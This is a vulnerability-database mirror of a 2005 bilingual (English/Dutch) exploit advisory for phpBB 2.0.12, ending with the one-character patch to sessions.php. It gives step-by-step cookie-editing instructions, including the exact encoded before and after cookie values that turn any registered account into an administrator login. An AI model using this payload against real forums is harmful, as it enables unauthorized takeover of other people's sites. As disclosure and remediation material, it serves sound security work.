Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpBB2012session.txt

🗓️ 12 Mar 2005 00:00:00Reported by PPCType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

phpBB 2.0.12 has a critical exploit for session handling; update to 2.0.13 is required.

Code
`  
  
-----------------------------------  
  
phpBB 2.0.12 Session Handling  
Administrator Authentication  
Bypass EXPLOIT -SIMPLIFIED-  
- By PPC^Rebyte  
  
-----------------------------------  
  
03maa2005  
  
** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **  
  
[ ENGLISH VERSION ]  
  
*** Status  
__________  
  
phpBB has already been informed about this exploit and has released a  
'critical update' on 27 februari 2005, however most forums are still running  
version 2.0.12 or lower.  
  
VULNERABLE:  
- 2.0.x --> 2.0.12  
  
IMMUNE:  
- 2.0.13 or newer  
  
  
1* Intro  
________  
  
The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit  
for this bug.  
  
Link to Paisterist's exploit at Packetstormsecurity:  
http://packetstormsecurity.org/0503-exploits/phpbbsession.c  
  
This program didn't work as it should on my pc, so I had to find out a way  
for myself to exploit the bug manually.  
This seemed to be much easier than compiling that C exploit and fool around  
with it until it eventually still doesn't work (in my case).  
This simplified manual method I'll describe can also be used for Internet  
Explorer or other browsers instead of only Mozilla/Firefox.  
  
  
2* The bug  
__________  
  
We're going to edit a cookie so that when you visit a certain forum another  
time you will get logged in having admin rights. This is possible due to a  
bug in includes/sessions.php  
--> if( $sessiondata['autologinid'] == $auto_login_key )  
  
  
3* Preparation  
______________  
  
1. Register at forum?  
  
2. Log in with account  
+ UNCHECK "Log in automatically"  
  
3. Close browser to be sure a cookie is made.  
  
4. Locate cookie  
*firefox: X:\Documents and Settings\Name\Application  
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt  
--> search the .txt for the domainname (domain.tld)  
--> default cookiename = phpbbmysql  
*iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]  
--> default cookiename = phpbbmysql  
  
4* Let's Xploit!  
________________  
  
Open the cookie in a text editor and search a line that resembles:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D  
  
|  
[ your 'user id' ] ____|  
  
Replace this with:  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D  
  
|  
[ 2 = 'user id' of admin ] ____|  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
Save cookie and close.  
Open your browser and surf to forum.  
  
You'll now be automatically logged in having admin right :)  
  
  
5* Solution  
___________  
  
* Update phpBB to version 2.0.13  
  
- or -  
  
* in "includes/sessions.php" replace code:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
if( $sessiondata['autologinid'] == $auto_login_key )  
  
replace with:  
  
if( $sessiondata['autologinid'] === $auto_login_key )  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
  
6* Outro  
________  
  
THE.END  
  
Greetings 2 everyone at Rebyte and the whole Belgian scene !!  
Additional greetings 2 Paisterist for the original C exploit !  
  
-- PPC^Rebyte --  
-- [email protected] --  
  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
[ NEDERLANDSE VERSIE ]  
  
*** Status  
__________  
  
phpBB is geïnformeerd over deze exploit en heeft een 'critical update'  
gelanceerd op 27 februari, maar de meeste forums draaien nog steeds op  
versie 2.0.12 of lager.  
  
KWETSBAAR:  
- 2.0.x tot 2.0.12  
  
IMMUUN:  
- 2.0.13 of nieuwer  
  
  
1* Intro  
________  
  
De ontdekker van de bug is onbekend, meldt "Paisterist" die een C exploit  
heeft geschreven voor deze bug.  
  
Link naar Paisterist's exploit op Packetstormsecurity:  
http://packetstormsecurity.org/0503-exploits/phpbbsession.c  
  
Dit programma werkte voor geen klop op mijn pc, dus heb ik zelf een manier  
gezocht, door middel van de exploit, om de bug handmatig te exploiteren.  
Dit ging eigenlijk veel sneller dan de C exploit te moeten compileren  
en ermee rond te moeten klungelen terwijl het uiteindelijk niet goed werkt  
(in mijn geval).  
De vereenvoudigde handmatige methode die ik omschrijf kan tevens gebruikt  
worden voor Internet Explorer of andere browsers ipv alleen Firefox.  
  
  
2* Werking  
__________  
  
We gaan een cookie zo aanpassen dat wanneer je een bepaald forum nog eens  
bezoekt je ingelogd wordt met admin rechten door een bug in sessions.php  
--> if( $sessiondata['autologinid'] == $auto_login_key )  
  
3* Voorbereiding  
________________  
  
1. Eventueel Registreren op forum  
  
2. Inloggen met account  
+ Automatisch Inloggen UITVINKEN  
  
3. Browser sluiten zodat er zeker een cookie wordt aangemaakt  
  
4. Cookie lokaliseren  
*bij firefox: X:\Documents and Settings\Name\Application  
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt  
--> zoek in de .txt naar de domeinnaam (domain.tld)  
--> standaard cookienaam = phpbbmysql  
*bij iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]  
--> standaard cookienaam = phpbbmysql  
  
4* Let's Xploit!  
________________  
  
Open de cookie in een teksteditor en zoek naar een lijn die gelijkt op:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D  
  
|  
[ je 'user id' ] ____|  
  
Vervang dit door:  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D  
  
|  
[ 2 = 'user id' van admin ] ____|  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
Cookie opslaan en sluiten.  
Browser openen en naar forum surfen.  
  
Normaal wordt je nu ingelogd met admin rechten :)  
  
  
5* Oplossing  
____________  
  
* phpBB updaten naar 2.0.13  
  
- of -  
  
* in includes/sessions.php code vervangen:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
if( $sessiondata['autologinid'] == $auto_login_key )  
  
vervangen door:  
  
if( $sessiondata['autologinid'] === $auto_login_key )  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
  
6* Outro  
________  
  
THE.END  
  
Greetings 2 everyone at Rebyte en de hele Belgische scene !!  
Additional greetings 2 Paisterist voor de originele C exploit !  
  
-- PPC^Rebyte --  
-- [email protected] --  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
phpbb exploit session handling
23